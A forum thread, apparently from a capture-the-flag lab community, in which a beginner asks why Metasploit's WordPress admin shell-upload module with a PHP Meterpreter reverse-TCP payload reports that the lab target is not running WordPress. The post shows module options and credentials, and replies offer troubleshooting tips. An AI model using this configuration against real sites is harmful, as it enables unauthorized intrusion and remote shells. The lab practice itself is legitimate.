SHIELD - Metasploit : The target does not appear to be using WordPress

Hi!
Firstly, sorry for all the mistakes in english i’m going to make … (French dude & Noob Pentester)

I having issue with Metasploit, indeed when i try to use the wp_admin_shell_upload.

Show options output: (LHost IP hidden)

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   P@s5w0rd!        yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.29      yes       The target host(s), range CIDR identifier, or hosts file with syntax
                                          'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wordpress                yes       The base path to the wordpress application
   USERNAME   admin            yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.XXX     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress

run output (LHost IP hidden)

[*] Started reverse TCP handler on 10.10.14.XXX:4444 
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.

I saw on many thread that can be a problem from Lhost so i changed it with the OpenVPN one.
And i saw an another point about my firewall, but i work on macOs BigSur, and i don’t really know how to fix it. I try to disable it but it’s not better …

Thanks a lot :slight_smile:

PS: I don’t want to use parrot or Kali on a Vbox, I am in network class with my mac. I’m a dumbass I know.

Is the TARGETURI correct? Is Wordpress running on http://10.10.10.29/wordpress

Many Walkthroughs use /wordpress for TARGETURI, and http://10.10.10.29/wordpress work fine so I think it’s good

@TazWake said:
Is the TARGETURI correct? Is Wordpress running on http://10.10.10.29/wordpress

@Mastau said:

Many Walkthroughs use /wordpress for TARGETURI, and http://10.10.10.29/wordpress work fine so I think it’s good

Ok. MSF is saying that whatever you are pointing it at isn’t running Wordpress.

Can you log in manually at: http://10.10.10.29/wordpress/wp-login.php ?

Yup

@TazWake said:
@Mastau said:

Many Walkthroughs use /wordpress for TARGETURI, and http://10.10.10.29/wordpress work fine so I think it’s good

Ok. MSF is saying that whatever you are pointing it at isn’t running Wordpress.

Can you log in manually at: http://10.10.10.29/wordpress/wp-login.php ?

@Mastau said:

Yup

Ok, so you might have to go for a manual exploit then. If MSF cant see the Wordpress running, it can’t exploit it.

Okay i’ll try it

@TazWake said:
@Mastau said:

Yup

Ok, so you might have to go for a manual exploit then. If MSF cant see the Wordpress running, it can’t exploit it.

You can also disable the Test for the wordpress and run it. The Blog VulnHub ‘Mr.Robot 1’ - CTF - Jack Hacks has an example, where disabling the Test helped. But you still need to add a “Firewall Rule” -disabling isn’t always the best Idea. In System Settings> Security & Privacy>Firewall, you can add an App (metasploit).